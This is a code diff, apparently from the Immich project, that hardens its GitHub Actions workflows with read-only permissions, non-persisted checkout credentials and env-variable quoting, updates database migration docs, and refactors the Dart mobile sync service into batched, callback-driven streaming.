- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- id: found_paths
|
- id: found_paths
|
||||||
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
|
||||||
with:
|
with:
|
||||||
@ -58,6 +65,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./server
|
working-directory: ./server
|
||||||
@ -65,6 +74,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -95,6 +106,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./cli
|
working-directory: ./cli
|
||||||
@ -102,6 +115,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -136,6 +151,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_cli == 'true' }}
|
||||||
runs-on: windows-latest
|
runs-on: windows-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./cli
|
working-directory: ./cli
|
||||||
@ -143,6 +160,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -170,6 +189,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_web == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_web == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./web
|
working-directory: ./web
|
||||||
@ -177,6 +198,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -215,6 +238,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_e2e == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_e2e == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./e2e
|
working-directory: ./e2e
|
||||||
@ -222,6 +247,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -254,6 +281,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_server == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./server
|
working-directory: ./server
|
||||||
@ -261,6 +290,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -279,6 +310,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_e2e_server_cli == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_e2e_server_cli == 'true' }}
|
||||||
runs-on: mich
|
runs-on: mich
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./e2e
|
working-directory: ./e2e
|
||||||
@ -287,6 +320,7 @@ jobs:
|
|||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
with:
|
with:
|
||||||
|
persist-credentials: false
|
||||||
submodules: 'recursive'
|
submodules: 'recursive'
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
@ -321,6 +355,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_e2e_web == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_e2e_web == 'true' }}
|
||||||
runs-on: mich
|
runs-on: mich
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./e2e
|
working-directory: ./e2e
|
||||||
@ -329,6 +365,7 @@ jobs:
|
|||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
with:
|
with:
|
||||||
|
persist-credentials: false
|
||||||
submodules: 'recursive'
|
submodules: 'recursive'
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
@ -362,8 +399,13 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_mobile == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_mobile == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Flutter SDK
|
- name: Setup Flutter SDK
|
||||||
uses: subosito/flutter-action@e938fdf56512cc96ef2f93601a5a40bde3801046 # v2
|
uses: subosito/flutter-action@e938fdf56512cc96ef2f93601a5a40bde3801046 # v2
|
||||||
with:
|
with:
|
||||||
@ -378,11 +420,16 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' }}
|
if: ${{ needs.pre-job.outputs.should_run_ml == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./machine-learning
|
working-directory: ./machine-learning
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Install uv
|
- name: Install uv
|
||||||
uses: astral-sh/setup-uv@0c5e2b8115b80b4c7c5ddf6ffdd634974642d182 # v5
|
uses: astral-sh/setup-uv@0c5e2b8115b80b4c7c5ddf6ffdd634974642d182 # v5
|
||||||
- uses: actions/setup-python@8d9ed9ac5c53483de85588cdf95a591a75ab9f55 # v5
|
- uses: actions/setup-python@8d9ed9ac5c53483de85588cdf95a591a75ab9f55 # v5
|
||||||
@ -411,6 +458,8 @@ jobs:
|
|||||||
needs: pre-job
|
needs: pre-job
|
||||||
if: ${{ needs.pre-job.outputs['should_run_.github'] == 'true' }}
|
if: ${{ needs.pre-job.outputs['should_run_.github'] == 'true' }}
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
defaults:
|
defaults:
|
||||||
run:
|
run:
|
||||||
working-directory: ./.github
|
working-directory: ./.github
|
||||||
@ -418,6 +467,8 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
|
||||||
- name: Setup Node
|
- name: Setup Node
|
||||||
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
|
||||||
@ -434,22 +485,31 @@ jobs:
|
|||||||
shellcheck:
|
shellcheck:
|
||||||
name: ShellCheck
|
name: ShellCheck
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
steps:
|
steps:
|
||||||
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false

      - name: Run ShellCheck
        uses: ludeeus/action-shellcheck@master
        with:
          ignore_paths: >-
            **/open-api/**
-            **/openapi/**
+            **/openapi**
            **/node_modules/**

  generated-api-up-to-date:
    name: OpenAPI Clients
    runs-on: ubuntu-latest
+    permissions:
+      contents: read
    steps:
      - name: Checkout code
        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false

      - name: Setup Node
        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
@@ -476,14 +536,18 @@ jobs:

      - name: Verify files have not changed
        if: steps.verify-changed-files.outputs.files_changed == 'true'
+        env:
+          CHANGED_FILES: ${{ steps.verify-changed-files.outputs.changed_files }}
        run: |
          echo "ERROR: Generated files not up to date!"
-          echo "Changed files: ${{ steps.verify-changed-files.outputs.changed_files }}"
+          echo "Changed files: ${CHANGED_FILES}"
          exit 1

  generated-typeorm-migrations-up-to-date:
    name: TypeORM Checks
    runs-on: ubuntu-latest
+    permissions:
+      contents: read
    services:
      postgres:
        image: tensorchord/pgvecto-rs:pg14-v0.2.0@sha256:739cdd626151ff1f796dc95a6591b55a714f341c737e27f045019ceabf8e8c52
@@ -505,6 +569,8 @@ jobs:
    steps:
      - name: Checkout code
        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false

      - name: Setup Node
        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
@@ -521,7 +587,7 @@ jobs:
        run: npm run migrations:run

      - name: Test npm run schema:reset command works
-        run: npm run typeorm:schema:reset
+        run: npm run schema:reset

      - name: Generate new migrations
        continue-on-error: true
@@ -535,9 +601,11 @@ jobs:
            server/src
      - name: Verify migration files have not changed
        if: steps.verify-changed-files.outputs.files_changed == 'true'
+        env:
+          CHANGED_FILES: ${{ steps.verify-changed-files.outputs.changed_files }}
        run: |
          echo "ERROR: Generated migration files not up to date!"
-          echo "Changed files: ${{ steps.verify-changed-files.outputs.changed_files }}"
+          echo "Changed files: ${CHANGED_FILES}"
          cat ./src/*-TestMigration.ts
          exit 1

@@ -555,9 +623,11 @@ jobs:

      - name: Verify SQL files have not changed
        if: steps.verify-changed-sql-files.outputs.files_changed == 'true'
+        env:
+          CHANGED_FILES: ${{ steps.verify-changed-sql-files.outputs.changed_files }}
        run: |
          echo "ERROR: Generated SQL files not up to date!"
-          echo "Changed files: ${{ steps.verify-changed-sql-files.outputs.changed_files }}"
+          echo "Changed files: ${CHANGED_FILES}"
          exit 1

  # mobile-integration-tests:
.github/workflows/weblate-lock.yml (13 changed lines, vendored)
@@ -4,30 +4,32 @@ on:
  pull_request:
    branches: [main]

+permissions: {}
+
jobs:
  pre-job:
    runs-on: ubuntu-latest
+    permissions:
+      contents: read
    outputs:
      should_run: ${{ steps.found_paths.outputs.i18n == 'true' && github.head_ref != 'chore/translations'}}
    steps:
      - name: Checkout code
        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4
+        with:
+          persist-credentials: false
      - id: found_paths
        uses: dorny/paths-filter@de90cc6fb38fc0963ad72b210f1f284cd68cea36 # v3
        with:
          filters: |
            i18n:
              - 'i18n/!(en)**\.json'
-      - name: Debug
-        run: |
-          echo "Should run: ${{ steps.found_paths.outputs.i18n == 'true' && github.head_ref != 'chore/translations'}}"
-          echo "Found i18n paths: ${{ steps.found_paths.outputs.i18n }}"
-          echo "Head ref: ${{ github.head_ref }}"

  enforce-lock:
    name: Check Weblate Lock
    needs: [pre-job]
    runs-on: ubuntu-latest
+    permissions: {}
    if: ${{ needs.pre-job.outputs.should_run == 'true' }}
    steps:
      - name: Check weblate lock
@@ -47,6 +49,7 @@ jobs:
    name: Weblate Lock Check Success
    needs: [enforce-lock]
    runs-on: ubuntu-latest
+    permissions: {}
    if: always()
    steps:
      - name: Any jobs failed?
@@ -1,14 +1,14 @@
 # Database Migrations

-After making any changes in `server/src/entities`, a database migration needs to run in order to register the changes in the database. Follow the steps below to create a new migration.
+After making any changes in `server/src/schema`, a database migration needs to run in order to register the changes in the database. Follow the steps below to create a new migration.

 1. Run the command

    ```bash
-   npm run typeorm:migrations:generate <migration-name>
+   npm run migrations:generate <migration-name>
    ```

 2. Check if the migration file makes sense.
-3. Move the migration file to the folder `./server/src/migrations` in your code editor.
+3. Move the migration file to the folder `./server/src/schema/migrations` in your code editor.

 The server will automatically detect `*.ts` file changes and restart. Part of the server start-up process includes running any new migrations, so they will be applied immediately.
docs/src/pages/errors.md (new file, 5 lines)
@@ -0,0 +1,5 @@
+# Errors
+
+## TypeORM Upgrade
+
+The upgrade to Immich `v2.x.x` has a required upgrade path to `v1.132.0+`. This means it is required to start up the application at least once on version `1.132.0` (or later). Doing so will complete database schema upgrades that are required for `v2.0.0`. After Immich has successfully booted on this version, shut the system down and try the `v2.x.x` upgrade again.
@@ -996,6 +996,7 @@
   "filetype": "Filetype",
   "filter": "Filter",
   "filter_people": "Filter people",
+  "filter_places": "Filter places",
   "find_them_fast": "Find them fast by name with search",
   "fix_incorrect_match": "Fix incorrect match",
   "folder": "Folder",
@@ -1,8 +1,12 @@
+import 'package:http/http.dart' as http;
 import 'package:immich_mobile/domain/models/sync_event.model.dart';
-import 'package:openapi/api.dart';

 abstract interface class ISyncApiRepository {
   Future<void> ack(List<String> data);

-  Stream<List<SyncEvent>> getSyncEvents(List<SyncRequestType> type);
+  Future<void> streamChanges(
+    Function(List<SyncEvent>, Function() abort) onData, {
+    int batchSize,
+    http.Client? httpClient,
+  });
 }
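The commit replaces the pull-based `getSyncEvents` stream with a push-based callback. A minimal sketch of how a caller might drive the new interface, with a hypothetical `runSync` helper and cancellation flag that are not part of this commit:

```dart
import 'package:immich_mobile/domain/interfaces/sync_api.interface.dart';
import 'package:immich_mobile/domain/models/sync_event.model.dart';

Future<void> runSync(ISyncApiRepository repo, {bool Function()? isCancelled}) {
  // streamChanges invokes onData once per batch; calling abort() asks the
  // repository to stop reading the HTTP stream after the current batch.
  return repo.streamChanges((List<SyncEvent> events, Function() abort) async {
    if (isCancelled?.call() ?? false) {
      abort();
      return;
    }
    if (events.isEmpty) {
      return;
    }
    // process events here, then ack the last one so the server can advance
    await repo.ack([events.last.ack]);
  });
}
```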
@@ -2,9 +2,17 @@ import 'package:immich_mobile/domain/interfaces/db.interface.dart';
 import 'package:openapi/api.dart';

 abstract interface class ISyncStreamRepository implements IDatabaseRepository {
-  Future<bool> updateUsersV1(Iterable<SyncUserV1> data);
-  Future<bool> deleteUsersV1(Iterable<SyncUserDeleteV1> data);
+  Future<void> updateUsersV1(Iterable<SyncUserV1> data);
+  Future<void> deleteUsersV1(Iterable<SyncUserDeleteV1> data);

-  Future<bool> updatePartnerV1(Iterable<SyncPartnerV1> data);
-  Future<bool> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data);
+  Future<void> updatePartnerV1(Iterable<SyncPartnerV1> data);
+  Future<void> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data);
+
+  Future<void> updateAssetsV1(Iterable<SyncAssetV1> data);
+  Future<void> deleteAssetsV1(Iterable<SyncAssetDeleteV1> data);
+  Future<void> updateAssetsExifV1(Iterable<SyncAssetExifV1> data);
+
+  Future<void> updatePartnerAssetsV1(Iterable<SyncAssetV1> data);
+  Future<void> deletePartnerAssetsV1(Iterable<SyncAssetDeleteV1> data);
+  Future<void> updatePartnerAssetsExifV1(Iterable<SyncAssetExifV1> data);
 }
@@ -25,7 +25,7 @@ class DeviceSyncService {
         _localAlbumRepository = localAlbumRepository,
         _localAssetRepository = localAssetRepository;

-  Future<void> syncAlbums() async {
+  Future<void> sync() async {
     try {
       final Stopwatch stopwatch = Stopwatch()..start();
       // The deviceAlbums will not have the updatedAt field
@@ -2,25 +2,11 @@

 import 'dart:async';

-import 'package:collection/collection.dart';
 import 'package:immich_mobile/domain/interfaces/sync_api.interface.dart';
 import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
+import 'package:immich_mobile/domain/models/sync_event.model.dart';
 import 'package:logging/logging.dart';
 import 'package:openapi/api.dart';
-import 'package:worker_manager/worker_manager.dart';

-const _kSyncTypeOrder = [
-  SyncEntityType.userDeleteV1,
-  SyncEntityType.userV1,
-  SyncEntityType.partnerDeleteV1,
-  SyncEntityType.partnerV1,
-  SyncEntityType.assetDeleteV1,
-  SyncEntityType.assetV1,
-  SyncEntityType.assetExifV1,
-  SyncEntityType.partnerAssetDeleteV1,
-  SyncEntityType.partnerAssetV1,
-  SyncEntityType.partnerAssetExifV1,
-];

 class SyncStreamService {
   final Logger _logger = Logger('SyncStreamService');
@@ -37,164 +23,70 @@ class SyncStreamService {
         _syncStreamRepository = syncStreamRepository,
         _cancelChecker = cancelChecker;

-  Future<bool> _handleSyncData(
+  bool get isCancelled => _cancelChecker?.call() ?? false;
+
+  Future<void> sync() => _syncApiRepository.streamChanges(_handleEvents);
+
+  Future<void> _handleEvents(List<SyncEvent> events, Function() abort) async {
+    List<SyncEvent> items = [];
+    for (final event in events) {
+      if (isCancelled) {
+        _logger.warning("Sync stream cancelled");
+        abort();
+        return;
+      }
+
+      if (event.type != items.firstOrNull?.type) {
+        await _processBatch(items);
+      }
+
+      items.add(event);
+    }
+
+    await _processBatch(items);
+  }
+
+  Future<void> _processBatch(List<SyncEvent> batch) async {
+    if (batch.isEmpty) {
+      return;
+    }
+
+    final type = batch.first.type;
+    await _handleSyncData(type, batch.map((e) => e.data));
+    await _syncApiRepository.ack([batch.last.ack]);
+    batch.clear();
+  }
+
+  Future<void> _handleSyncData(
     SyncEntityType type,
     // ignore: avoid-dynamic
     Iterable<dynamic> data,
   ) async {
-    if (data.isEmpty) {
-      _logger.warning("Received empty sync data for $type");
-      return false;
-    }
-
     _logger.fine("Processing sync data for $type of length ${data.length}");
-    try {
-      if (type == SyncEntityType.partnerV1) {
-        return await _syncStreamRepository.updatePartnerV1(data.cast());
-      }
-
-      if (type == SyncEntityType.partnerDeleteV1) {
-        return await _syncStreamRepository.deletePartnerV1(data.cast());
-      }
-
-      if (type == SyncEntityType.userV1) {
-        return await _syncStreamRepository.updateUsersV1(data.cast());
-      }
-
-      if (type == SyncEntityType.userDeleteV1) {
-        return await _syncStreamRepository.deleteUsersV1(data.cast());
-      }
-    } catch (error, stack) {
-      _logger.severe("Error processing sync data for $type", error, stack);
-      return false;
-    }
-    _logger.warning("Unknown sync data type: $type");
-    return false;
-  }
+    // ignore: prefer-switch-expression
+    switch (type) {
+      case SyncEntityType.userV1:
+        return _syncStreamRepository.updateUsersV1(data.cast());
+      case SyncEntityType.userDeleteV1:
+        return _syncStreamRepository.deleteUsersV1(data.cast());
+      case SyncEntityType.partnerV1:
+        return _syncStreamRepository.updatePartnerV1(data.cast());
+      case SyncEntityType.partnerDeleteV1:
+        return _syncStreamRepository.deletePartnerV1(data.cast());
+      case SyncEntityType.assetV1:
+        return _syncStreamRepository.updateAssetsV1(data.cast());
+      case SyncEntityType.assetDeleteV1:
+        return _syncStreamRepository.deleteAssetsV1(data.cast());
+      case SyncEntityType.assetExifV1:
+        return _syncStreamRepository.updateAssetsExifV1(data.cast());
+      case SyncEntityType.partnerAssetV1:
+        return _syncStreamRepository.updatePartnerAssetsV1(data.cast());
+      case SyncEntityType.partnerAssetDeleteV1:
+        return _syncStreamRepository.deletePartnerAssetsV1(data.cast());
+      case SyncEntityType.partnerAssetExifV1:
+        return _syncStreamRepository.updatePartnerAssetsExifV1(data.cast());
+      default:
+        _logger.warning("Unknown sync data type: $type");
     }
   }
-
-  Future<void> _syncEvent(List<SyncRequestType> types) {
-    _logger.info("Syncing Events: $types");
-    final streamCompleter = Completer();
-    bool shouldComplete = false;
-    // the onDone callback might fire before the events are processed
-    // the following flag ensures that the onDone callback is not called
-    // before the events are processed and also that events are processed sequentially
-    Completer? mutex;
-    StreamSubscription? subscription;
-    try {
-      subscription = _syncApiRepository.getSyncEvents(types).listen(
-        (events) async {
-          if (events.isEmpty) {
-            _logger.warning("Received empty sync events");
-            return;
-          }
-
-          // If previous events are still being processed, wait for them to finish
-          if (mutex != null) {
-            await mutex!.future;
-          }
-
-          if (_cancelChecker?.call() ?? false) {
-            _logger.info("Sync cancelled, stopping stream");
-            subscription?.cancel();
-            if (!streamCompleter.isCompleted) {
-              streamCompleter.completeError(
-                CanceledError(),
-                StackTrace.current,
-              );
-            }
-            return;
-          }
-
-          // Take control of the mutex and process the events
-          mutex = Completer();
-
-          try {
-            final eventsMap = events.groupListsBy((event) => event.type);
-            final Map<SyncEntityType, String> acks = {};
-
-            for (final type in _kSyncTypeOrder) {
-              final data = eventsMap[type];
-              if (data == null) {
-                continue;
-              }
-
-              if (_cancelChecker?.call() ?? false) {
-                _logger.info("Sync cancelled, stopping stream");
-                mutex?.complete();
-                mutex = null;
-                if (!streamCompleter.isCompleted) {
-                  streamCompleter.completeError(
-                    CanceledError(),
-                    StackTrace.current,
-                  );
-                }
-
-                return;
-              }
-
-              if (data.isEmpty) {
-                _logger.warning("Received empty sync events for $type");
-                continue;
-              }
-
-              if (await _handleSyncData(type, data.map((e) => e.data))) {
-                // ignore: avoid-unsafe-collection-methods
-                acks[type] = data.last.ack;
-              } else {
-                _logger.warning("Failed to handle sync events for $type");
-              }
-            }
-
-            if (acks.isNotEmpty) {
-              await _syncApiRepository.ack(acks.values.toList());
-            }
-            _logger.info("$types events processed");
-          } catch (error, stack) {
-            _logger.warning("Error handling sync events", error, stack);
-          } finally {
-            mutex?.complete();
-            mutex = null;
-          }
-
-          if (shouldComplete) {
-            _logger.info("Sync done, completing stream");
-            if (!streamCompleter.isCompleted) streamCompleter.complete();
-          }
-        },
-        onError: (error, stack) {
-          _logger.warning("Error in sync stream for $types", error, stack);
-          // Do not proceed if the stream errors
-          if (!streamCompleter.isCompleted) {
-            // ignore: avoid-missing-completer-stack-trace
-            streamCompleter.completeError(error, stack);
-          }
-        },
-        onDone: () {
-          _logger.info("$types stream done");
-          if (mutex == null && !streamCompleter.isCompleted) {
-            streamCompleter.complete();
-          } else {
-            // Marks the stream as done but does not complete the completer
-            // until the events are processed
-            shouldComplete = true;
-          }
-        },
-      );
-    } catch (error, stack) {
-      _logger.severe("Error starting sync stream", error, stack);
-      if (!streamCompleter.isCompleted) {
-        streamCompleter.completeError(error, stack);
-      }
-    }
-    return streamCompleter.future.whenComplete(() {
-      _logger.info("Sync stream completed");
-      return subscription?.cancel();
-    });
-  }
-
-  Future<void> syncUsers() =>
-      _syncEvent([SyncRequestType.usersV1, SyncRequestType.partnersV1]);
 }
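The rewritten service flushes a batch whenever the incoming event type changes, hands the whole batch to one repository call, and acks only the batch's last event. A self-contained sketch of that flush-on-type-change contract, using plain Dart records instead of the project's `SyncEvent` model:

```dart
// Minimal model of _handleEvents: events arrive grouped by type, each run of
// a single type becomes one handler call, and only the final ack of the run
// is reported back to the server.
void main() {
  final events = [
    ('userDeleteV1', 'ack-1'),
    ('userDeleteV1', 'ack-2'),
    ('userV1', 'ack-3'),
  ];

  final batches = <List<(String, String)>>[];
  var current = <(String, String)>[];
  for (final event in events) {
    // flush when the type changes, mirroring the firstOrNull?.type check
    if (current.isNotEmpty && event.$1 != current.first.$1) {
      batches.add(current);
      current = [];
    }
    current.add(event);
  }
  if (current.isNotEmpty) batches.add(current);

  for (final batch in batches) {
    print('handle ${batch.first.$1} x${batch.length}, ack ${batch.last.$2}');
  }
  // prints: handle userDeleteV1 x2, ack ack-2
  //         handle userV1 x1, ack ack-3
}
```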
@@ -7,45 +7,49 @@ import 'package:immich_mobile/utils/isolate.dart';
 import 'package:worker_manager/worker_manager.dart';

 class BackgroundSyncManager {
-  Cancelable<void>? _userSyncTask;
+  Cancelable<void>? _syncTask;
   Cancelable<void>? _deviceAlbumSyncTask;

   BackgroundSyncManager();

   Future<void> cancel() {
     final futures = <Future>[];
-    if (_userSyncTask != null) {
-      futures.add(_userSyncTask!.future);
+    if (_syncTask != null) {
+      futures.add(_syncTask!.future);
     }
-    _userSyncTask?.cancel();
-    _userSyncTask = null;
+    _syncTask?.cancel();
+    _syncTask = null;

     return Future.wait(futures);
   }

   // No need to cancel the task, as it can also be run when the user logs out
-  Future<void> syncDeviceAlbums() {
+  Future<void> syncLocal() {
     if (_deviceAlbumSyncTask != null) {
       return _deviceAlbumSyncTask!.future;
     }

     _deviceAlbumSyncTask = runInIsolateGentle(
-      computation: (ref) => ref.read(deviceSyncServiceProvider).syncAlbums(),
+      computation: (ref) => ref.read(deviceSyncServiceProvider).sync(),
     );

     return _deviceAlbumSyncTask!.whenComplete(() {
       _deviceAlbumSyncTask = null;
     });
   }

-  Future<void> syncUsers() {
-    if (_userSyncTask != null) {
-      return _userSyncTask!.future;
+  Future<void> syncRemote() {
+    if (_syncTask != null) {
+      return _syncTask!.future;
     }

-    _userSyncTask = runInIsolateGentle(
-      computation: (ref) => ref.read(syncStreamServiceProvider).syncUsers(),
+    _syncTask = runInIsolateGentle(
+      computation: (ref) => ref.read(syncStreamServiceProvider).sync(),
     );
-    return _userSyncTask!.whenComplete(() {
-      _userSyncTask = null;
